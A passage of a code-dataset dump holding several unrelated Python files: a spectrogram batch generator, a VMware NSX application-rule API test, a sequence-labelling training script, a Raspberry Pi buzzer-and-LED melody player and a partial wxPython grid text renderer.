np.ndarray):\n # Since spectrograms are converted to skimages of type uint8, the max value is 255 and the min 0\n max_val = np.amax(x)\n min_val = np.amin(x)\n if max_val > 255 or min_val < 0 or min_val == max_val:\n return np.array([])\n\n normalized_input = (x - min_val) / (max_val - min_val)\n\n return normalized_input\n\n # Private methods\n def __check_transform(self, transform_type, window_size):\n if (transform_type == 'constant-q' or transform_type == 'cqt') and (window_size == 10 or window_size == 100):\n raise Exception(\n 'SkaterbotDataGeneratorError: Cannot have Constant-Q transform with window-size==' + str(window_size))\n return transform_type\n\n def __check_ratio(self, ttr: float):\n if ttr > 1:\n raise Exception('SkaterbotDataGeneratorError: \"train_test_ratio\" should have a value lower than 1.')\n if ttr <= 0:\n raise Exception('SkaterbotDataGeneratorError: \"train_test_ratio\" should have a positive value.')\n\n def __initialize_input_set(self):\n self.train_counter = 0\n\n def __append_input(self, x_batch, x):\n\n if len(x.shape) == 1:\n raise Exception(\n 'SkaterbotDataGenerator: Something went wrong. The input \"x\" that was given had one dimension'\n 'instead of 2 or more.')\n # A transform's shape is 2-dimensional. Thus we add one more dimension to make it image-like. (one colour)\n if len(x.shape) == 2:\n x = np.expand_dims(x, axis=-1)\n\n x_batch = np.append(x_batch, np.expand_dims(x, axis=0), axis=0)\n return x_batch\n\n def __initialize_train_set(self):\n self.train_counter = 0\n np.random.shuffle(self.train_set)\n\n def __initialize_validation_set(self):\n self.validation_counter = 0\n\n def __initialize_test_set(self):\n self.test_counter = 0\n\n def __get_empty_batches(self, regression_mode):\n x_train = np.empty((0, self.time_size, self.freq_size, 1))\n if regression_mode:\n y_train = np.empty((0, 1))\n else:\n y_train = np.empty((0, self.time_size))\n return x_train, y_train\n\n def __append_sample(self, x_batch, y_batch, x, y):\n if x.shape != (self.time_size, self.freq_size):\n print('Skipped this sample...')\n return x_batch, y_batch\n else:\n # A transform's shape is 2-dimensional. Thus we add one more dimension to make it image-like. (one colour)\n x = np.expand_dims(x, axis=-1)\n\n x_batch = np.append(x_batch, np.expand_dims(x, axis=0), axis=0)\n y_batch = np.append(y_batch, np.expand_dims(y, axis=0), axis=0)\n return x_batch, y_batch\n\n def __make_train_batch(self, batch_size: int, regression_mode: bool):\n x_train, y_train = self.__get_empty_batches(regression_mode)\n\n i = 0\n while i < batch_size:\n if self.train_counter == self.n_train: # Reached end of dataset\n return np.array([]), np.array([])\n sample_name, start_idx, end_idx = self.extract_samplename_and_offset(\n self.train_set[self.train_counter])\n self.train_counter += 1\n x = self.read_input(sample_name, start_idx, end_idx)\n\n if regression_mode:\n y = self.read_raw_output(sample_name, start_idx, end_idx)\n else:\n y = self.read_output(sample_name, start_idx, end_idx)\n\n x_is_not_ok = self.__check_x(x)\n y_is_not_ok = self.__check_y(y, regression_mode)\n if x_is_not_ok or y_is_not_ok:\n continue\n\n x_train, y_train = self.__append_sample(x_train, y_train, x, y)\n i += 1\n\n return x_train, y_train\n\n def __make_validation_batch(self, batch_size: int, regression_mode: bool):\n x_validation, y_validation = self.__get_empty_batches(regression_mode)\n\n i = 0\n while i < batch_size:\n if self.validation_counter >= self.n_validation:\n return np.array([]), np.array([])\n sample_name, start_idx, end_idx = self.extract_samplename_and_offset(\n self.validation_set[self.validation_counter])\n\n self.validation_counter += 1\n\n x = self.read_input(sample_name, start_idx, end_idx)\n\n if regression_mode:\n y = self.read_raw_output(sample_name, start_idx, end_idx)\n else:\n y = self.read_output(sample_name, start_idx, end_idx)\n\n x_is_not_ok = self.__check_x(x)\n y_is_not_ok = self.__check_y(y, regression_mode)\n if x_is_not_ok or y_is_not_ok:\n continue\n\n x_validation, y_validation = self.__append_sample(x_validation, y_validation, x, y)\n i += 1\n\n return x_validation, y_validation\n\n def __make_test_batch(self, batch_size: int, regression_mode: bool):\n x_test, y_test = self.__get_empty_batches(regression_mode)\n\n i = 0\n while i < batch_size:\n if self.test_counter >= self.n_test: # Reached end of dataset\n return np.array([]), np.array([])\n sample_name, start_idx, end_idx = self.extract_samplename_and_offset(\n self.test_set[self.test_counter])\n self.test_counter += 1\n\n x = self.read_input(sample_name, start_idx, end_idx)\n\n if regression_mode:\n y = self.read_raw_output(sample_name, start_idx, end_idx)\n else:\n y = self.read_output(sample_name, start_idx, end_idx)\n\n x_is_not_ok = self.__check_x(x)\n y_is_not_ok = self.__check_y(y, regression_mode)\n if x_is_not_ok or y_is_not_ok:\n continue\n\n x_test, y_test = self.__append_sample(x_test, y_test, x, y)\n i += 1\n return x_test, y_test\n\n def __make_input_batch(self, batch_size):\n x_batch = np.empty((0, self.time_size, self.freq_size, 1))\n\n i = 0\n while i < batch_size:\n sample_name, start_idx, end_idx = self.extract_samplename_and_offset(\n self.train_set[self.train_counter])\n self.train_counter += 1\n\n x = self.read_input(sample_name, start_idx, end_idx)\n\n x_is_not_ok = self.__check_x(x)\n if x_is_not_ok:\n continue\n\n x_batch = self.__append_input(x_batch, x)\n i += 1\n\n return x_batch\n\n def __check_x(self, x):\n x_is_not_ok = False\n if x.size == 0:\n x_is_not_ok = True\n return x_is_not_ok\n\n def __check_y(self, y, regression_mode):\n y_is_not_ok = False\n if y.size < self.time_size and not regression_mode:\n y_is_not_ok = True\n if y.size != 1 and regression_mode:\n y_is_not_ok = True\n return y_is_not_ok\n\n def __get_train_test_samples(self, train_test_ratio: float, validation_ratio: float):\n self.n_samples = self.dataset.shape[0]\n\n temp_n_train = int(self.n_samples * train_test_ratio)\n\n self.n_test = self.n_samples - temp_n_train\n\n self.n_validation = int(temp_n_train * validation_ratio)\n self.n_train = temp_n_train - self.n_validation\n\n train_set = self.dataset[:self.n_train]\n print('train_set --> to_index:', self.n_train)\n validation_set = self.dataset[self.n_train: self.n_train + self.n_validation]\n print('validation_set --> from-to_index:', self.n_train, 'to', self.n_train + self.n_validation)\n test_set = self.dataset[self.n_train + self.n_validation:]\n print('test_set --> from_index', self.n_train + self.n_validation)\n\n return train_set, validation_set, test_set\n","sub_path":"poi_detector/src/dataset/load_dataset/data_generator2.py","file_name":"data_generator2.py","file_ext":"py","file_size_in_byte":16045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"226879611","text":"#!/usr/bin/env python\n# coding=utf-8\n#\n# Copyright © 2015 VMware, Inc. All Rights Reserved.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated\n# documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and\n# to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all copies or substantial portions\n# of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED\n# TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF\n# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n\nfrom tests.config import *\nfrom nsxramlclient.client import NsxClient\n\n\n__author__ = 'shrirang'\n\n\ndef create_application_rule(session, edge_id='edge-1'):\n app_rule_spec = session.extract_resource_body_schema('appRules', 'create')\n\n app_rule_spec['applicationRule']['name'] = 'raml_test'\n app_rule_spec['applicationRule']['script'] = 'acl vmware_page url_beg /vmware redirect ' \\\n 'location https://www.vmware.com/ if vmware_page'\n\n create_response = session.create('appRules', uri_parameters={'edgeId': edge_id},\n request_body_dict=app_rule_spec)\n\n session.view_response(create_response)\n\n return create_response['objectId']\n\n\ndef application_rule_by_id(session, object_id, edge_id='edge-1'):\n response = session.read('appRule', uri_parameters={'edgeId': edge_id, 'appruleID': object_id})\n session.view_response(response)\n\n\ndef application_rule(session, edge_id='edge-1'):\n response = session.read('appRules', uri_parameters={'edgeId': edge_id})\n session.view_response(response)\n\n\ndef update_application_rule(session, object_id, edge_id='edge-1'):\n app_rule_spec = session.extract_resource_body_schema('appRule', 'update')\n\n app_rule_spec['applicationRule']['name'] = 'raml_test'\n app_rule_spec['applicationRule']['script'] = 'acl vmware_page_new url_beg /vmware redirect ' \\\n 'location https://www.vmware.com/ if vmware_page_new'\n response = session.update('appRule', uri_parameters={'edgeId': edge_id, 'appruleID': object_id},\n request_body_dict=app_rule_spec)\n\n session.view_response(response)\n\n\ndef delete_application_rule_by_id(session, object_id, edge_id='edge-1'):\n response = session.delete('appRule', uri_parameters={'edgeId': edge_id, 'appruleID': object_id})\n\n session.view_response(response)\n\n\ndef delete_application_rule(session, edge_id='edge-1'):\n response = session.delete('appRules', uri_parameters={'edgeId': edge_id})\n\n session.view_response(response)\n\n\ndef main():\n session = NsxClient(nsxraml_file, nsxmanager, nsx_username, nsx_password, debug=True)\n\n object_id = create_application_rule(session)\n\n application_rule_by_id(session, object_id)\n\n application_rule(session)\n\n update_application_rule(session, object_id)\n\n delete_application_rule_by_id(session, object_id)\n\n delete_application_rule(session)\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"tests/application_rule.py","file_name":"application_rule.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"565624033","text":"# -*-coding:utf-8-*-\nimport sys\nfrom optparse import OptionParser\n\nimport torch\nimport yaml\nfrom torch import optim\n\nfrom infer import Inference\nfrom model.sequence_labeling_trainer import SLTrainer\nfrom nn.dataset import *\nfrom nn.modules import *\nfrom util.common_util import *\nfrom util.data_analyse_util import *\nfrom util.embedding import *\n\n\ndef extract_feature_dict(feature_cols, feature_names, feature_dict, data_path,\n sentence_lens=None, normalize=True, has_label=True):\n \"\"\"从数据中统计特征\n Args:\n feature_cols: list(int), 特征的列数\n feature_names: list(str), 特征名称\n feature_dict: dict\n data_path: str ,路径\n sentence_lens: list, 用于记录句子长度\n normalize: bool, 是否标准化单词\n has_label: bool, 数据是否带有标签\n \"\"\"\n data_idx = 0\n data = load_data(data_path)\n for i, train_list in enumerate(data):\n update_feature_dict(\n train_list, feature_dict, feature_cols, feature_names,\n normalize=normalize, has_label=has_label)\n sentence_lens.append(len(train_list[0]))\n data_idx += 1\n return data_idx, data\n\n\ndef update_feature_dict(train_list, feature_dict, feature_cols, feature_names,\n normalize=True, has_label=True):\n \"\"\"\n 更新特征字典\n Args:\n train_list: list(list) [[word,tag,fileName],...]\n feature_dict: dict\n feature_cols: list(int)\n feature_names: list(str)\n normalize: bool, 是否标准化单词\n has_label: bool\n \"\"\"\n for i, col in enumerate(feature_cols):\n for token in train_list[col]:\n if normalize:\n token = normalize_word(token)\n feature_dict[feature_names[i]].update([token])\n if has_label:\n for label in train_list[1]:\n feature_dict['label'].add(label)\n\n\ndef pre_processing(configs):\n path_train = configs['data_params']['path_train']\n path_dev = configs['data_params']['path_dev'] if 'path_dev' in configs['data_params'] else None\n path_test = configs['data_params']['path_test'] if 'path_test' in configs['data_params'] else None\n\n feature_cols = configs['data_params']['feature_cols']\n feature_names = configs['data_params']['feature_names']\n min_counts = configs['data_params']['alphabet_params']['min_counts']\n root_alphabet = configs['data_params']['alphabet_params']['path']\n path_pretrain_list = configs['data_params']['path_pretrain']\n\n use_char = configs['model_params']['use_char']\n max_word_len = configs['model_params']['char_max_len']\n\n normalize = configs['word_norm']\n feature_dict = {}\n for feature_name in feature_names:\n feature_dict[feature_name] = Counter()\n feature_dict['label'] = set()\n sentence_lens = []\n # 处理训练、开发、测试数据\n print('读取文件...')\n data_count, train_data = extract_feature_dict(\n feature_cols, feature_names, feature_dict, path_train, sentence_lens,\n normalize=normalize, has_label=True, )\n print('`{0}`: {1}'.format(path_train, data_count))\n data_count, test_data = extract_feature_dict(\n feature_cols, feature_names, feature_dict, path_test, sentence_lens,\n normalize=normalize, has_label=True, )\n print('`{0}`: {1}'.format(path_test, data_count))\n\n # 构建label alphabet\n token2id_dict = dict()\n label2id_dict = dict()\n for label_idx, label in enumerate(sorted(feature_dict['label'])):\n label2id_dict[label] = label_idx + 1 # 从1开始编号\n token2id_dict['label'] = label2id_dict\n path_label2id_pkl = os.path.join(root_alphabet, 'label.pkl')\n if not is_file_exist(root_alphabet):\n os.makedirs(root_alphabet)\n dump_pkl_data(label2id_dict, path_label2id_pkl)\n\n # 构建特征alphabet\n for i, feature_name in enumerate(feature_names):\n feature2id_dict = dict()\n start_idx = 1\n for item in sorted(feature_dict[feature_name].items(), key=lambda d: d[1], reverse=True):\n if item[1] < min_counts[i]:\n continue\n feature2id_dict[item[0]] = start_idx\n start_idx += 1\n token2id_dict[feature_name] = feature2id_dict\n # write to file\n dump_pkl_data(feature2id_dict, os.path.join(root_alphabet, '{0}.pkl'.format(feature_name)))\n dump_pkl_data(token2id_dict, os.path.join(root_alphabet, 'token2id_dict.pkl'))\n\n # 构建embedding table\n print('抽取预训练词向量...')\n for i, feature_name in enumerate(feature_names):\n if path_pretrain_list[i]:\n print('特征`{0}`使用预训练词向量`{1}`:'.format(feature_name, path_pretrain_list[i]))\n word_embed_table, exact_match_count, fuzzy_match_count, unknown_count, total_count = build_word_embed(\n token2id_dict[feature_name], path_pretrain_list[i])\n print('\\t精确匹配: {0} / {1}'.format(exact_match_count, total_count))\n print('\\t模糊匹配: {0} / {1}'.format(fuzzy_match_count, total_count))\n print('\\tOOV: {0} / {1}'.format(unknown_count, total_count))\n # write to file\n path_pkl = os.path.join(os.path.dirname(path_pretrain_list[i]), '{0}.embed.pkl'.format(feature_name))\n dump_pkl_data(word_embed_table, path_pkl)\n # 将token转成id\n # train\n train_data_tokens2id_dict = {}\n for j, col in enumerate(feature_cols):\n feature_name = feature_names[j]\n for sentence in train_data:\n array = tokens2id_array(sentence[col], token2id_dict[feature_name])\n if feature_name not in train_data_tokens2id_dict:\n train_data_tokens2id_dict[feature_name] = list()\n train_data_tokens2id_dict[feature_name].append(array)\n if \"label\" not in train_data_tokens2id_dict:\n train_data_tokens2id_dict[\"label\"] = list()\n label_arr = tokens2id_array(sentence[1], token2id_dict['label'])\n train_data_tokens2id_dict['label'].append(label_arr)\n data_tokens2id_dict_path = os.path.join(os.path.dirname(path_train), 'train.token2id.pkl')\n dump_pkl_data(train_data_tokens2id_dict, data_tokens2id_dict_path)\n # test\n test_data_tokens2id_dict = {}\n for j, col in enumerate(feature_cols):\n feature_name = feature_names[j]\n for sentence in test_data:\n array = tokens2id_array(sentence[col], token2id_dict[feature_name])\n if feature_name not in test_data_tokens2id_dict:\n test_data_tokens2id_dict[feature_name] = list()\n test_data_tokens2id_dict[feature_name].append(array)\n if \"label\" not in test_data_tokens2id_dict:\n test_data_tokens2id_dict[\"label\"] = list()\n label_arr = tokens2id_array(sentence[1], token2id_dict['label'])\n test_data_tokens2id_dict['label'].append(label_arr)\n data_tokens2id_dict_path = os.path.join(os.path.dirname(path_train), 'test.token2id.pkl')\n dump_pkl_data(test_data_tokens2id_dict, data_tokens2id_dict_path)\n\n\ndef init_model(configs):\n \"\"\"初始化模型\n Returns:\n model: SLModel\n \"\"\"\n use_char = configs['model_params']['use_char']\n\n feature_names = configs['data_params']['feature_names']\n # init feature alphabet size dict\n feature_size_dict = dict()\n root_alphabet = configs['data_params']['alphabet_params']['path']\n for feature_name in feature_names:\n alphabet = read_bin(os.path.join(root_alphabet, '{0}.pkl'.format(feature_name)))\n feature_size_dict[feature_name] = len(alphabet) + 1\n alphabet = read_bin(os.path.join(root_alphabet, 'label.pkl'))\n feature_size_dict['label'] = len(alphabet) + 1\n if use_char:\n alphabet = read_bin(os.path.join(root_alphabet, 'char.pkl'))\n feature_size_dict['char'] = len(alphabet) + 1\n\n # init feature dim size dict and pretrain embed dict\n path_pretrain_list = configs['data_params']['path_pretrain']\n embed_sizes = configs['model_params']['embed_sizes']\n feature_dim_dict = dict()\n for i, feature_name in enumerate(feature_names):\n feature_dim_dict[feature_name] = embed_sizes[i]\n pretrained_embed_dict = dict()\n for i, feature_name in enumerate(feature_names):\n if path_pretrain_list[i]:\n path_pkl = os.path.join(os.path.dirname(path_pretrain_list[i]), '{0}.embed.pkl'.format(feature_name))\n embed = read_bin(path_pkl)\n feature_dim_dict[feature_name] = embed.shape[-1]\n pretrained_embed_dict[feature_name] = embed\n if use_char:\n feature_dim_dict['char'] = configs['model_params']['char_dim']\n\n # init requires_grad_dict\n require_grads = configs['model_params']['require_grads']\n require_grad_dict = {}\n for i, feature_name in enumerate(feature_names):\n require_grad_dict[feature_name] = require_grads[i]\n if use_char:\n require_grad_dict['char'] = configs['model_params']['char_requires_grad']\n\n # init char parameters\n filter_sizes = configs['model_params']['conv_filter_sizes']\n filter_nums = configs['model_params']['conv_filter_nums']\n\n # init rnn parameters\n rnn_unit_type = configs['model_params']['rnn_type']\n num_rnn_units = configs['model_params']['rnn_units']\n num_layers = configs['model_params']['rnn_layers']\n bi_flag = configs['model_params']['bi_flag']\n\n use_crf = configs['model_params']['use_crf']\n\n # init other parameters\n dropout_rate = configs['model_params']['dropout_rate']\n average_batch = configs['model_params']['average_batch']\n deterministic = configs['model_params']['deterministic']\n use_cuda = configs['model_params']['use_cuda']\n\n # init model\n sl_model = SLModel(\n feature_names=feature_names, feature_size_dict=feature_size_dict, feature_dim_dict=feature_dim_dict,\n pretrained_embed_dict=pretrained_embed_dict, require_grad_dict=require_grad_dict, use_char=use_char,\n filter_sizes=filter_sizes, filter_nums=filter_nums, rnn_unit_type=rnn_unit_type, num_rnn_units=num_rnn_units,\n num_layers=num_layers, bi_flag=bi_flag, dropout_rate=dropout_rate, average_batch=average_batch,\n use_crf=use_crf, use_cuda=use_cuda)\n\n if deterministic: # for deterministic\n torch.backends.cudnn.enabled = False\n\n use_cuda = configs['model_params']['use_cuda']\n if use_cuda:\n sl_model = sl_model.cuda()\n\n return sl_model\n\n\ndef init_train_data(configs):\n \"\"\"初始化训练数据\n Returns:\n data_iter_train: DataIter\n data_iter_dev: DataIter\n \"\"\"\n path_train = configs['data_params']['path_train']\n char_max_len = configs['model_params']['char_max_len']\n batch_size = configs['model_params']['batch_size']\n max_len_limit = configs['max_len_limit']\n\n features_names = configs['data_params']['feature_names']\n data_names = [name for name in features_names]\n use_char = configs['model_params']['use_char']\n if use_char:\n data_names.append('char')\n data_names.append('label')\n\n # load train data\n train_object_dict = read_bin(os.path.join(os.path.dirname(path_train), 'train.token2id.pkl'))\n train_count = len(train_object_dict[data_names[0]])\n\n # 拆分训练集\n data_utils = DataUtil(\n train_count, train_object_dict, data_names, use_char=use_char, char_max_len=char_max_len,\n batch_size=batch_size, max_len_limit=max_len_limit)\n data_iter_train, data_iter_dev = data_utils.split_dataset(proportions=(8, 2), shuffle=False)\n\n return data_iter_train, data_iter_dev\n\n\ndef init_test_data(configs):\n \"\"\"初始化测试数据\n Returns:\n data_test: DataRaw\n data_iter_test: DataIter\n \"\"\"\n path_train = configs['data_params']['path_train']\n char_max_len = configs['model_params']['char_max_len']\n batch_size = configs['model_params']['batch_size']\n max_len_limit = configs['max_len_limit']\n\n features_names = configs['data_params']['feature_names']\n data_names = [name for name in features_names]\n use_char = configs['model_params']['use_char']\n if use_char:\n data_names.append('char')\n data_names.append('label')\n\n # load test data\n test_object_dict = read_bin(os.path.join(os.path.dirname(path_train), 'test.token2id.pkl'))\n\n # 拆分训练集\n data_utils = DataUtil(\n len(test_object_dict[\"word\"]), test_object_dict, data_names, use_char=use_char, char_max_len=char_max_len,\n batch_size=batch_size, max_len_limit=max_len_limit)\n [data_iter_test] = data_utils.split_dataset(proportions=(1,), shuffle=False)\n\n return data_iter_test\n\n\ndef init_optimizer(configs, model):\n \"\"\"初始化optimizer\n Returns:\n optimizer\n \"\"\"\n optimizer_type = configs['model_params']['optimizer']\n learning_rate = configs['model_params']['learning_rate']\n l2_rate = configs['model_params']['l2_rate']\n momentum = configs['model_params']['momentum']\n lr_decay = 0\n # 过滤不需要更新参数的\n parameters = filter(lambda p: p.requires_grad, model.parameters())\n\n if optimizer_type.lower() == \"sgd\":\n lr_decay = configs['model_params']['lr_decay']\n optimizer = optim.SGD(parameters, lr=learning_rate, momentum=momentum, weight_decay=l2_rate)\n elif optimizer_type.lower() == \"adagrad\":\n optimizer = optim.Adagrad(parameters, lr=learning_rate, weight_decay=l2_rate)\n elif optimizer_type.lower() == \"adadelta\":\n optimizer = optim.Adadelta(parameters, lr=learning_rate, weight_decay=l2_rate)\n elif optimizer_type.lower() == \"rmsprop\":\n optimizer = optim.RMSprop(parameters, lr=learning_rate, weight_decay=l2_rate)\n elif optimizer_type.lower() == \"adam\":\n optimizer = optim.Adam(parameters, lr=learning_rate, weight_decay=l2_rate)\n else:\n print('请选择正确的optimizer: {0}'.format(optimizer_type))\n exit()\n return optimizer, lr_decay\n\n\ndef init_trainer(configs, data_iter_train, data_iter_dev, model, optimizer, lr_decay):\n \"\"\"初始化model trainer\n Returns:\n trainer: SLTrainer\n \"\"\"\n feature_names = configs['data_params']['feature_names']\n use_char = configs['model_params']['use_char']\n max_len_char = configs['model_params']['char_max_len']\n path_save_model = configs['data_params']['path_model']\n if not is_file_exist(path_save_model):\n os.makedirs(path_save_model)\n\n nb_epoch = configs['model_params']['nb_epoch']\n max_patience = configs['model_params']['max_patience']\n\n learning_rate = configs['model_params']['learning_rate']\n\n trainer = SLTrainer(\n data_iter_train=data_iter_train, data_iter_dev=data_iter_dev, feature_names=feature_names,\n use_char=use_char, max_len_char=max_len_char, model=model, optimizer=optimizer,\n path_save_model=path_save_model, nb_epoch=nb_epoch, max_patience=max_patience,\n learning_rate=learning_rate, lr_decay=lr_decay)\n\n return trainer\n\n\ndef load_model(configs):\n \"\"\"加载预训练的model\n \"\"\"\n model = init_model(configs)\n\n path_model = os.path.join(configs['data_params']['path_model'], \"sequence_model\")\n model_state = torch.load(path_model)\n model.load_state_dict(model_state)\n return model\n\n\ndef train_model(configs):\n \"\"\"训练模型\n \"\"\"\n # init model\n sl_model = init_model(configs)\n print(sl_model)\n\n # init data\n data_iter_train, data_iter_dev = init_train_data(configs)\n\n # init optimizer\n optimizer, lr_decay = init_optimizer(configs, model=sl_model)\n\n # init trainer\n model_trainer = init_trainer(\n configs, data_iter_train, data_iter_dev, sl_model, optimizer, lr_decay)\n\n model_trainer.fit()\n\n\ndef test_model(configs):\n \"\"\"测试模型\n \"\"\"\n path_test = configs['data_params']['path_test'] if 'path_test' in configs['data_params'] else None\n # init model\n model = load_model(configs)\n\n # init test data\n data_test = load_data(path_test)\n data_iter_test = init_test_data(configs)\n\n # init infer\n if 'path_test_result' not in configs['data_params'] or \\\n not configs['data_params']['path_test_result']:\n path_result = configs['data_params']['path_test'] + '.result'\n else:\n path_result = configs['data_params']['path_test_result']\n # label to id dict\n path_pkl = os.path.join(configs['data_params']['alphabet_params']['path'], 'label.pkl')\n label2id_dict = read_bin(path_pkl)\n infer = Inference(\n model=model, data_iter=data_iter_test, data_raw=data_test,\n path_result=path_result, label2id_dict=label2id_dict)\n\n # do infer\n infer.infer2file()\n\n\ndef parse_opts():\n op = OptionParser()\n op.add_option(\n '-c', '--config', dest='config', type='str', help='配置文件路径')\n op.add_option('--train', dest='train', action='store_true', default=True, help='训练模式')\n op.add_option('--test', dest='test', action='store_true', default=False, help='测试模式')\n op.add_option(\n '-p', '--preprocess', dest='preprocess', action='store_true', default=False, help='是否进行预处理')\n argv = [] if not hasattr(sys.modules['__main__'], '__file__') else sys.argv[1:]\n (opts, args) = op.parse_args(argv)\n if not opts.config:\n op.print_help()\n exit()\n if opts.test:\n opts.train = False\n return opts\n\n\ndef main():\n opts = parse_opts()\n configs = yaml.load(codecs.open(opts.config, encoding='utf-8'), Loader=None)\n\n if opts.train: # train\n # 判断是否需要预处理\n if opts.preprocess:\n pre_processing(configs)\n print(\"pre process 结束,开始训练模型。。。。\")\n # 训练\n train_model(configs)\n print(\"训练模型结束,开始测试。。。。\")\n # test\n test_model(configs)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"121618625","text":"#!/usr/bin/env python\nimport RPi.GPIO as GPIO\nimport time\n\nBZRPin = 40\n\nGPIO.setmode(GPIO.BOARD)\t # Numbers pins by physical location\nGPIO.setup(BZRPin, GPIO.OUT) # Set pin mode as output\nGPIO.output(BZRPin, GPIO.LOW)\n\n#Dictionary for notes\n\nnotes = {\n\t'D3': 146.83,\n\t'E3': 164.81,\n\t'F3': 174.61,\n\t'G3': 196.00,\n\t'C4': 261.63,\n\t'D4': 293.66,\n\t'E4': 329.63,\n\t'F4': 349.23,\n\t'G4': 392.00,\n\t'A4': 440.00,\n}\n\npins = {\n\t'A': 11,\n\t'C': 12,\n\t'D': 13,\n\t'E': 15,\n\t'F': 16,\n\t'G': 18,\n}\n\nTWINKLE_1 = 'C4,,C4,,G4,,G4,,A4,,A4,,G4,G4,G4,'\n\nTWINKLE_2 = 'F4,,F4,,E4,,E4,,D4,,D4,,C4,C4,C4,'\n\nTWINKLE_3 = 'G3,,G3,,F3,,F3,,E3,,E3,,D3,D3,D3,'\n\nTWINKLE = ','.join([TWINKLE_1, TWINKLE_2, TWINKLE_3, TWINKLE_3, TWINKLE_1, TWINKLE_2])\n\n#DOADEER = 'CDECECE' Forget this\n\nSLEEP_TIME = 0.25\n\ndef LEDnote(LED, command):\n\tif command == 'On':\n\t\tGPIO.output(pins[LED], GPIO.LOW)\n\tif command == 'Off':\n\t\tGPIO.output(pins[LED], GPIO.HIGH)\n\ndef main():\n\tfor pin in pins.values():\n\t\tGPIO.setup(pin, GPIO.OUT)\n\n\tp = GPIO.PWM(BZRPin, 50) # init frequency: 50HZ\n\n\ttry:\n\t\tstarted = False\n\t\tfor note in TWINKLE.split(\",\"):\n\t\t\tif note.strip() == '':\n\t\t\t\tif started:\n\t\t\t\t\tstarted = False\n\t\t\t\t\tp.stop()\n\t\t\t\ttime.sleep(SLEEP_TIME)\n\t\t\t\tcontinue\n\t\t\tf = notes.get(note)\n\t\t\tp.ChangeFrequency(f)\n\t\t\tSNote = ''\n\t\t\tSNote = note[0]\n\t\t\tLEDnote(SNote, 'On')\n\t\t\tif not started:\n\t\t\t\tstarted = True\n\t\t\t\tp.start(50)\n\t\t\ttime.sleep(SLEEP_TIME)\n\t\t\tLEDnote(SNote, 'Off')\n\texcept KeyboardInterrupt:\n\t\tpass\n\tfinally:\n\t\tLEDnote(SNote, 'Off')\n\t\tSNote = ''\n\t\tp.stop()\n\t\tGPIO.cleanup()\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"twinklewlights.py","file_name":"twinklewlights.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"280114573","text":"import wx\r\nimport wx.grid\r\nfrom wx.lib import wordwrap\r\nfrom wx.lib.mixins.grid import GridAutoEditMixin \r\n\r\n# from http://stackoverflow.com/questions/5868280/auto-wrap-and-newlines-in-wxpython-grid\r\n# ---------------------------------------------------------------------------------------\r\nclass CustomGridCellAutoWrapStringRenderer(wx.grid.PyGridCellRenderer): \r\n def __init__(self): \r\n wx.grid.PyGridCellRenderer.__init__(self)\r\n\r\n def Draw(self, grid, attr, dc, rect, row, col, isSelected):\r\n text = grid.GetCellValue(row, col)\r\n dc.SetFont( attr.GetFont() ) \r\n text = wordwrap.wordwrap(text, grid.GetColSize(col), dc, breakLongWords = False)\r\n hAlign, vAlign = attr.GetAlignment() \r\n if isSelected: \r\n bg = grid.GetSelectionBackground() \r\n fg = grid.GetSelectionForeground() \r\n else: \r\n bg = attr.GetBackgroundColour()\r\n fg = attr.GetTextColour() \r\n dc.SetTextBackground(bg) \r\n dc.SetTextForeground(fg)\r\n dc.SetBrush(wx.Brush(bg, wx.SOLID))\r\n dc.SetPen(wx.TRANSPARENT_PEN)\r\n dc.DrawRectangleRect(rect) \r\n grid.DrawTextRectangle(dc, text, rect, hAlign, vAlign)\r\n\r\n def GetBestSize(self, grid, attr, dc, row, col): \r\n text = grid.GetCellValue(row, col)\r\n dc.SetFont(attr.GetFont())\r\n text = wordwrap.wordwrap(text, grid.GetColSize(col), dc, breakLongWords = False)\r\n w, h, lineHeight = dc.GetMultiLineTextExtent(text) \r\n return wx.Size(w, h) \r\n\r\n def Clone(self): \r\n return CutomGridCellAutoWrapStringRenderer()\r\n\r\nclass MyGrid (wx.grid.Grid, GridAutoEditMixin ):\r\n def __init__ (self, parent, size):\r\n wx.grid.Grid.__init__(self, parent,size=size)\r\n GridAutoEditMixin.__init__(self)\r\n \r\n\r\nclass MyFrame(wx.Frame):\r\n def __init__(self, parent = None, id = -1, title = \"My Test\"):\r\n wx.Frame.__init__(self, parent, id, title, size=((350,300)) )\r\n\r\n panel = wx.Panel(self)\r\n\r\n button1 = wx.Button(panel, id=-1, label='Button1', pos=( 10, 220))\r\n button2 = wx.Button(panel, id=-1, label='Button2', pos=(110, 220))\r\n button3 = wx.Button(panel, id=-1, label='Button3', pos=(210, 220))\r\n\r\n grid = MyGrid (panel, size=(350, 200))\r\n #grid = wx.grid.Grid(panel, size=(350, 200))\r\n grid.CreateGrid(3, 3)\r\n\r\n grid.SetDefaultRenderer(CustomGridCellAutoWrapStringRenderer()) #use custom renderer\r\n\r\n grid.SetRowSize(0, 50)\r\n grid.SetRowSize(1, 50)\r\n grid.SetRowSize(2, 50)\r\n\r\n attr = 